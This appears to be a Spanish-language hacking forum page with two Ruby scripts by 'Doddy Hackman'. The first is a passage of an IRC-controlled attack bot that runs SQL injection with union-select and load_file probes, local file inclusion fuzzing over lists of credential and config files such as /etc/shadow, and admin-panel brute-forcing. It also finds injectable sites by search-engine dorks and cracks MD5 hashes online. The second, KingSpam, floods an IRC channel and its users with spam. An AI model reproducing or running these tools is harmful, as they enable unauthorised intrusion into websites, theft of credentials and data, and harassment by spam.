resultado = resultado + "[+] City : Not Found\n "
end
if code=~/ Country< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
resultado = resultado + "[+] Country : " + $2+ "\n "
else
resultado = resultado + "[+] Country : Not Found\n "
end
if code=~/ State or Region< \/ td>< td align=( .* ) >< b> ( .* ) < \/ b>< \/ td>/
resultado = resultado + "[+] State or Region : " + $2+ "\n " ;
else
resultado = resultado + "[+] State of Region : Not Found\n "
end
resultado = resultado + "\n [+] Getting DNS ...\n \n "
control = "0"
code = toma( "http://www.ip-adress.com/reverse_ip/" + ip)
dnss = code.scan ( / whois\/ ( .* ?) \">Whois/)
dnss.flatten.each do |dns|
begin
if dns != " "
control = " 1 "
resultado = resultado + " [ + ] DNS Found : "+dns
end
end
end
if control==" 0 "
resultado = resultado + " \n[ - ] DNS Not Found\n"
end
return resultado
end
def details(url,by)
pass1,pass2 = bypass(by)
resultado = " "
hextest = " 0x2f6574632f706173737764" #/etc/passwd
hextest = " 0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
web1 = url.sub(/hackman/," 0x4b30425241")
web2 = url.sub(/hackman/," concat( 0x4b30425241,user( ) ,0x4b30425241,database( ) ,0x4b30425241,version( ) ,0x4b30425241) ")
web3 = url.sub(/hackman/," unhex( hex( concat( char( 69 ,82 ,84 ,79 ,82 ,56 ,53 ,52 ) ,load_file( "+hextest+" ) ) ) ) ")
resultado = resultado + " \n[ + ] Extracting information of the DB\n"
code1 = toma(web2)
if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
user,data,ver = $1,$2,$3
resultado = resultado + " \n[ + ] Username : "+user
resultado = resultado + " \n[ + ] Database : "+data
resultado = resultado + " \n[ + ] Version : "+ver+" \n\n"
else
resultado = resultado + " [ - ] Not Found\n"
end
code2 = toma(web1+pass1+" from"+pass1+" mysql.user "+pass2)
code3 = toma(web1+pass1+" from"+pass1+" information_schema.tables "+pass2)
code4 = toma(web3)
if code2=~/K0BRA/
resultado = resultado + " [ + ] Mysql User : ON\n"
end
if code3=~/K0BRA/
resultado = resultado + " [ + ] information_schema : ON\n"
end
if code4=~/ERTOR854/
resultado = resultado + " [ + ] load_file : ON\n"
end
return resultado
end
def findlength(url,by)
pass1,pass2 = bypass(by)
z = " 1 "
control = " 0 "
resultado = " "
resultado = resultado + " \n[ + ] Finding columns lenght ...\n\n"
x = " concat( 0x4b30425241,1 ,0x4b30425241) "
for num in ('2'..'25')
z = z+" ,"+num
x= x+" ,"+" concat( 0x4b30425241,"+num+" ,0x4b30425241) "
code = toma(url+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass1+" union"+pass1+" select "+pass1+x)
if code=~/K0BRA(.*?)K0BRA/
resultado = resultado + " [ + ] The Page has "+num+" columns\n"
resultado = resultado + " [ + ] The number "+$1+" print data\n"
z = z.sub($1," hackman")
sqli = url+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass1+" union"+pass1+" select "+pass1+z
control = " 1 "
break
end
end
if control != " 1 "
resultado = resultado + " [ - ] Columns lenght not found\n"
end
return resultado,sqli,control
end
def scanner_sqli(page,by)
pass1,pass2 = bypass(by)
resultado = " "
rta1 = " "
rta2 = " "
resultado = resultado + " [ + ] Testing vulnerability ...\n\n"
codeuno = toma(page+" 1 "+pass1+" and "+pass1+" 1 =0 "+pass2)
codedos = toma(page+" 1 "+pass1+" and "+pass1+" 1 =1 "+pass2)
if codeuno != codedos
resultado = resultado + " [ + ] Vulnerable !\n"
rta1,sqli,control = findlength(page,by)
if control==" 1 "
rta2 = details(sqli," -- ")
end
else
resultado = resultado + " [ - ] Not Vulnerable\n"
end
resultado = resultado + rta1 + rta2
return resultado
end
def scanner_lfi(web)
resultado = " "
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\P rogramFiles\A pacheGroup\A pache\l ogs\a ccess.log','C:\P rogramFiles\A pacheGroup\A pache\l ogs\e rror.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
resultado = resultado + " [ + ] Testing the vulnerability LFI...\n\n"
code = toma(web+" '")
if code=~/No such file or directory in <b>(.*)<\/ b> on line/
fpd = $1
resultado = resultado + "[+] LFI Detected\n \n "
resultado = resultado + "[Full Path Discloure]: "+fpd+"\n "
resultado = resultado + "\n [+] Fuzzing Files\n \n "
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
resultado= resultado + "[Link] : "+web+file+"\n "
end
end
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "[-] Not Vulnerable to LFI\n \n "
end
return resultado
end
def scanner_panel(page)
resultado = ""
panels = [' admin/ admin.asp ',' admin/ login.asp ',' admin/ index.asp ',' admin/ admin.aspx ',' admin/ login.aspx ',' admin/ index.aspx ',' admin/ webmaster.asp ',' admin/ webmaster.aspx ',' asp/ admin/ index.asp ',' asp/ admin/ index.aspx ',' asp/ admin/ admin.asp ',' asp/ admin/ admin.aspx ',' asp/ admin/ webmaster.asp ',' asp/ admin/ webmaster.aspx ',' admin/ ',' login.asp ',' login.aspx ',' admin.asp ',' admin.aspx ',' webmaster.aspx ',' webmaster.asp ',' login/ index.asp ',' login/ index.aspx ',' login/ login.asp ',' login/ login.aspx ',' login/ admin.asp ',' login/ admin.aspx ',' administracion/ index.asp ',' administracion/ index.aspx ',' administracion/ login.asp ',' administracion/ login.aspx ',' administracion/ webmaster.asp ',' administracion/ webmaster.aspx ',' administracion/ admin.asp ',' administracion/ admin.aspx ',' php/ admin/ ',' admin/ admin.php ',' admin/ index.php ',' admin/ login.php ',' admin/ system .php ',' admin/ ingresar.php ',' admin/ administrador.php ',' admin/ default.php ',' administracion/ ',' administracion/ index.php ',' administracion/ login.php ',' administracion/ ingresar.php ',' administracion/ admin.php ',' administration/ ',' administration/ index.php ',' administration/ login.php ',' administrator/ index.php ',' administrator/ login.php ',' administrator/ system .php ',' system / ',' system / login.php ',' admin.php ',' login.php ',' administrador.php ',' administration.php ',' administrator.php ',' admin1.html ',' admin1.php ',' admin2.php ',' admin2.html ',' yonetim.php ',' yonetim.html ',' yonetici.php ',' yonetici.html ',' adm/ ',' admin/ account.php ',' admin/ account.html ',' admin/ index.html ',' admin/ login.html ',' admin/ home.php ',' admin/ controlpanel.html ',' admin/ controlpanel.php ',' admin.html ',' admin/ cp.php ',' admin/ cp.html ',' cp.php ',' cp.html ',' administrator/ ',' administrator/ index.html ',' administrator/ login.html ',' administrator/ account.html ',' administrator/ account.php ',' administrator.html ',' login.html ',' modelsearch/ login.php ',' moderator.php ',' moderator.html ',' moderator/ login.php ',' moderator/ login.html ',' moderator/ admin.php ',' moderator/ admin.html ',' moderator/ ',' account.php ',' account.html ',' controlpanel/ ',' controlpanel.php ',' controlpanel.html ',' admincontrol.php ',' admincontrol.html ',' adminpanel.php ',' adminpanel.html ',' admin1.asp ',' admin2.asp ',' yonetim.asp ',' yonetici.asp ',' admin/ account.asp ',' admin/ home.asp ',' admin/ controlpanel.asp ',' admin/ cp.asp ',' cp.asp ',' administrator/ index.asp ',' administrator/ login.asp ',' administrator/ account.asp ',' administrator.asp ',' modelsearch/ login.asp ',' moderator.asp ',' moderator/ login.asp ',' moderator/ admin.asp ',' account.asp ',' controlpanel.asp ',' admincontrol.asp ',' adminpanel.asp ',' fileadmin/ ',' fileadmin.php ',' fileadmin.asp ',' fileadmin.html ',' administration.html ',' sysadmin.php ',' sysadmin.html ',' phpmyadmin/ ',' myadmin/ ',' sysadmin.asp ',' sysadmin/ ',' ur- admin.asp ',' ur- admin.php ',' ur- admin.html ',' ur- admin/ ',' Server.php ',' Server.html ',' Server.asp ',' Server/ ',' wp- admin/ ',' administr8.php ',' administr8.html ',' administr8/ ',' administr8.asp ',' webadmin/ ',' webadmin.php ',' webadmin.asp ',' webadmin.html ',' administratie/ ',' admins/ ',' admins.php ',' admins.asp ',' admins.html ',' administrivia/ ',' Database_Administration/ ',' WebAdmin/ ',' useradmin/ ',' sysadmins/ ',' admin1/ ',' system- administration/ ',' administrators/ ',' pgadmin/ ',' directadmin/ ',' staradmin/ ',' ServerAdministrator/ ',' SysAdmin/ ',' administer/ ',' LiveUser_Admin/ ',' sys- admin/ ',' typo3/ ',' panel/ ',' cpanel/ ',' cPanel/ ',' cpanel_file/ ',' platz_login/ ',' rcLogin/ ',' blogindex/ ',' formslogin/ ',' autologin/ ',' support_login/ ',' meta_login/ ',' manuallogin/ ',' simpleLogin/ ',' loginflat/ ',' utility_login/ ',' showlogin/ ',' memlogin/ ',' members/ ',' login- redirect/ ',' sub- login/ ',' wp- login/ ',' login1/ ',' dir- login/ ',' login_db/ ',' xlogin/ ',' smblogin/ ',' customer_login/ ',' UserLogin/ ',' login- us/ ',' acct_login/ ',' admin_area/ ',' bigadmin/ ',' project- admins/ ',' phppgadmin/ ',' pureadmin/ ',' sql- admin/ ',' radmind/ ',' openvpnadmin/ ',' wizmysqladmin/ ',' vadmind/ ',' ezsqliteadmin/ ',' hpwebjetadmin/ ',' newsadmin/ ',' adminpro/ ',' Lotus_Domino_Admin/ ',' bbadmin/ ',' vmailadmin/ ',' Indy_admin/ ',' ccp14admin/ ',' irc- macadmin/ ',' banneradmin/ ',' sshadmin/ ',' phpldapadmin/ ',' macadmin/ ',' administratoraccounts/ ',' admin4_account/ ',' admin4_colon/ ',' radmind- 1 / ',' Super- Admin/ ',' AdminTools/ ',' cmsadmin/ ',' SysAdmin2/ ',' globes_admin/ ',' cadmins/ ',' phpSQLiteAdmin/ ',' navSiteAdmin/ ',' server_admin_small/ ',' logo_sysadmin/ ',' server/ ',' database_administration/ ',' power_user/ ',' system_administration/ ',' ss_vms_admin_sm/ ']
resultado = resultado + "[+] Scanning ...\n \n "
control = "0"
panels.each do |panel|
begin
url = page+"/"+panel
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n "
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "\n [-] Not Found\n "
end
return resultado
end
def get_httpfinger(page)
resultado = ""
resultado = resultado + "[+] Searching ...\n \n "
resultado = resultado + httpfinger(page)
return resultado
end
def crack_md5(md5)
resultado = ""
resultado = resultado + "[+] Cracking ...\n \n "
code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
if code=~/pass : <b>(.*?)<\/ b>/
password = $1
resultado = resultado + "[+] md5online.net -> "+password+"\n "
else
resultado = resultado + "[-] md5online.net -> Not Found" + "\n "
end
code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
if code=~/<span class=' middle_title'>Hashed string<\/ span>: (.*?)<\/ div>/
password = $1
resultado = resultado + "[+] md5.my-addr.co -> "+password+"\n "
else
resultado = resultado + "[-] md5.my-addr.co -> Not Found" +"\n "
end
code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
if code=~/Decrypted Text: <\/ b>(.*?)<\/ font>/
password = $1
resultado = resultado + "[+] md5decryption.com -> "+password+"\n "
else
resultado = resultado + "[-] md5decryption.com -> Not Found"+"\n "
end
return resultado
end
def tiny_url(page)
resultado = ""
code = toma("http://tinyurl.com/api-create.php?url="+page)
if code=~/http/
resultado = resultado + "[+] Link : "+code
else
resultado = resultado + "[-] Error"
end
return resultado
end
def codificar_hex(text)
return "[+] Result : "+encode_hex(text)
end
def decodificar_hex(text)
return "[+] Result : "+decode_hex(text)
end
def codificar_base64(text)
return "[+] Result : "+Base64.encode64(text).chomp
end
def decodificar_base64(text)
return "[+] Result : "+Base64.decode64(text).chomp
end
def codificar_ascii(text)
resultado = ""
resultado = resultado + "[+] Result : "+text.split("").map(&:ord).to_s
return resultado
end
def md5_encode(text)
return "[+] Result : "+Digest::MD5.hexdigest(text).chomp
end
def scanner_dns(domain)
paths = ["www","www1","www2","www3","ftp","ns","mail","3com","aix","apache","back","bind","boreder","bsd","business","chains","cisco","content","corporate","cpv","dns","domino","dominoserver","download","e-mail","e-safe","email","esafe","external","extranet","firebox","firewall","front","fw","fw0","fwe","fw-1","firew","gate","gatekeeper","gateway","gauntlet","group","help","hop","hp","hpjet","hpux","http","https","hub","ibm","ids","info","inside","internal","internet","intranet","ipfw","irix","jet","list","lotus","lotusdomino","lotusnotes","lotusserver","mailfeed","mailgate","mailgateway","mailgroup","mailhost","maillist","mailpop","mailrelay","mimesweeper","ms","msproxy","mx","nameserver","news","newsdesk","newsfeed","newsgroup","newsroom","newsserver","nntp","notes","noteserver","notesserver","nt","outside","pix","pop","pop3","pophost","popmail","popserver","print","printer","private","proxy","proxyserver","public","qpop","raptor","read","redcreek","redhat","route","router","scanner","screen","screening","ecure","seek","smail","smap","smtp","smtpgateway","smtpgw","solaris","sonic","spool","squid","sun","sunos","suse","switch","transfer","trend","trendmicro","vlan","vpn","wall","web","webmail","webserver","webswitch","win2000","win2k","upload","file","fileserver","storage","backup","share","core","gw","wingate","main","noc","home","radius","security","access","dmz","domain","sql","mysql","mssql","postgres","db","database","imail","imap","exchange","sendmail","louts","test","logs","stage","staging","dev","devel","ppp","chat","irc","eng","admin","unix","linux","windows","apple","hp-ux","bigip","pc"]
resultado = ""
resultado = resultado + "[+] Searching DNS ...\n \n "
control = "0"
paths.each do |path|
begin
url = "http://"+path+"."+domain
status_code = response_code(url)
if status_code=="200"
resultado = resultado + "[+] Link : "+url+"\n "
control = "1"
end
end
end
if control=="1"
resultado = resultado + "\n [+] Done\n "
else
resultado = resultado + "\n [-] Not Found\n "
end
return resultado
end
def sqli_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n \n "
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n "
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
resultado = resultado + "\n [+] Finished\n "
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n \n "
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n \n "
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
def rfi_finder(dork,pages,opcion)
resultado = ""
if opcion=="bing"
resultado = resultado + "[+] Searching in Bing ...\n \n "
links = cortar(bing(dork,pages))
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found\n "
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
resultado = resultado + "\n [+] Finished\n "
elsif opcion=="google"
resultado = resultado + "[+] Searching in Google ...\n \n "
links = cortar(google(dork,pages))
if links.count.to_s=="0"
resultado = resultado + "[+] Searching in Google again ...\n \n "
links = cortar(google_recursive(dork,pages))
end
resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n \n "
if links.count.to_s=="0"
resultado = resultado + "[-] Links not found"
end
links.flatten.each do |link|
resultado = resultado + "[+] Link : "+link
begin
url = toma(link + "http://www.supertangas.com/")
if url=~/Los mejores TANGAS de la red/i
resultado = resultado + " [OK]\n "
else
resultado = resultado + " [FAIL]\n "
end
rescue
resultado = resultado + " [FAIL]\n "
end
end
else
resultado = "[-] Bad Option"
end
return resultado
end
#
def respuesta(to,texto)
resultado = texto.split("\n ")
resultado.flatten.each do |linea|
if linea != ""
$irc.print "PRIVMSG #{to} #{linea}\n "
sleep $timeout.to_i
end
end
end
def bot_online(host,port,canal,admin)
print "\n [+] Connecting ...\n "
begin
$irc = TCPSocket.open(host,port)
rescue
print "\n [-] Error connecting\n "
else
nick = "ClapTrap"
$irc.print "NICK "+nick+"\r \n "
$irc.print "USER "+nick+" 1 1 1 1\r \n "
$irc.print "JOIN #{canal}\r \n "
print "\n [+] Online\n "
while 1
code = $irc.recv(9999)
if code=~/PING (.*)/
$irc.print "PONG #{$1}\n "
end
if code=~/:(.*)!(.*) PRIVMSG (.*) :(.*)/
dedonde = $1
mensaje = $4
if dedonde==admin
if mensaje=~/!sqli (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_sqli(arg1,"--"))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!lfi (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_lfi(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!panel(.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_panel(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!fuzzdns (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,scanner_dns(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!locateip (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin, locateip(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!sqlifinder (.*) (.*) (.*)/
arg1 = $1
arg2 = $2
arg3 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,sqli_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!rfifinder (.*) (.*) (.*)/
arg1 = $1
arg1 = $2
arg1 = $3
arg1 = arg1.chomp
arg2 = arg2.chomp
arg3 = arg3.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,rfi_finder(arg1,arg2,arg3))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!crackit (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,crack_md5(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!tinyurl (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,tiny_url(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!httpfinger (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,get_httpfinger(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!md5 (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,md5_encode(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!base64 (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,decodificar_base64(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
end
if mensaje=~/!hex (.*) (.*)/
arg1 = $1
arg2 = $2
arg1 = arg1.chomp
arg2 = arg2.chomp
if arg2=="encode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if arg2=="decode"
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,decodificar_hex(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
end
if mensaje=~/!ascii (.*)/
arg1 = $1
arg1 = arg1.chomp
$irc.print "PRIVMSG #{admin} [+] Working ...\n "
respuesta(admin,codificar_ascii(arg1))
$irc.print "PRIVMSG #{admin} [+] Finished\n "
end
if mensaje=~/!help/
about = ""
about = about + "Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014" + "\n ";
about = about + "[++] Commands" + "\n ";
about = about + "[+] !help" + "\n ";
about = about + "[+] !locateip <web>" + "\n ";
about = about + "[+] !sqlifinder <dork> <count pages> <google/bing>" + "\n ";
about = about + "[+] !rfifinder <dork> <count pages> <google/bing>" + "\n ";
about = about + "[+] !panel <page>" + "\n ";
about = about + "[+] !fuzzdns <domain>" + "\n ";
about = about + "[+] !sqli <page>" + "\n ";
about = about + "[+] !lfi <page>" + "\n ";
about = about + "[+] !crackit <hash>" + "\n ";
about = about + "[+] !tinyurl <page>" + "\n ";
about = about + "[+] !httpfinger <page>" + "\n ";
about = about + "[+] !md5 <text>" + "\n ";
about = about + "[+] !base64 <encode/decode> <text>" + "\n ";
about = about + "[+] !ascii <encode/decode> <text>" + "\n ";
about = about + "[+] !hex <encode/decode> <text>" + "\n ";
about = about + "[++] Enjoy this IRC Bot" + "\n ";
respuesta(admin,about)
end
end
end
end
end
end
head()
print "[+] Host : "
host = gets.chomp
print "\n [+] Port : "
port = gets.chomp
print "\n [+] Channel : "
channel = gets.chomp
print "\n [+] Admin : "
admin = gets.chomp
bot_online(host,port,channel,admin)
copyright()
# The End ?
Eso es todo.
49
Programación / Scripting / [Ruby] KingSpam 0.4
en: 18 Septiembre 2015, 16:49 pm
Un simple script en Ruby para hacer spam en un canal IRC.
El codigo :
#!usr/bin/ruby
#KingSpam 0.4
#Coded By Doddy H
require "socket"
$nicks = [ "ruben" ,"negro jose" ,"rasputin" ,"juancho" ]
def head( )
print "\n \n == -- KingSpam 0.4 -- ==\n \n "
end
def uso( )
print "\n [+] Sintax : #{$0} <host> <channel> <spam list>\n "
end
def copyright( )
print "\n \n (C) Doddy Hackman 2012\n \n "
end
def read_file( file)
array = [ ]
File .open ( file, "r" ) do | lineas|
while ( linea = lineas.gets )
array .push ( linea)
end
end
return array
end
def load ( host,canal,spam_list)
print "\n [+] Connecting ...\n "
begin
irc = TCPSocket.open ( host,"6667" )
rescue
print "\n [-] Error\n "
else
lineas = read_file( spam_list)
nick_azar = $nicks [ rand ( $nicks.size ) ]
irc.print "NICK " + nick_azar+ "\r \n "
irc.print "USER " + nick_azar+ " 1 1 1 1\r \n "
irc.print "JOIN #{canal}\r \n "
print "\n [+] Online\n "
while 1
code = irc.recv ( 9999 )
#print code+"\n"
if code=~/ PING ( .* ) /
irc.print "PONG #{$1}\n "
end
if code=~/ :( .* ) 353 ( .* ) = ( .* ) :( .* ) /
nicks_found = $4
nicks = nicks_found.split ( " " )
end
print "\n [+] The party started\n \n "
while 1
sleep ( 20 ) # 1 minute
texto = lineas[ rand ( lineas.size ) ]
print "[+] Spamming channel #{canal}\n "
irc.print "PRIVMSG #{canal} #{texto}\n "
nicks.flatten .each do | nick|
if nick!=nick_azar
nick = nick.sub ( "+" ,"" )
nick = nick.sub ( "@" ,"" )
print "[+] Spam User : " + nick+ "\n "
irc.print "PRIVMSG #{nick} #{texto}\n "
end
end
end
end
end
end
head( )
host = ARGV[ 0 ]
canal = ARGV[ 1 ]
spam_list = ARGV[ 2 ]
if !host and !canal and !spam_list
uso( )
else
load ( host,canal,spam_list)
end
copyright( )
# The End ?
Eso es todo.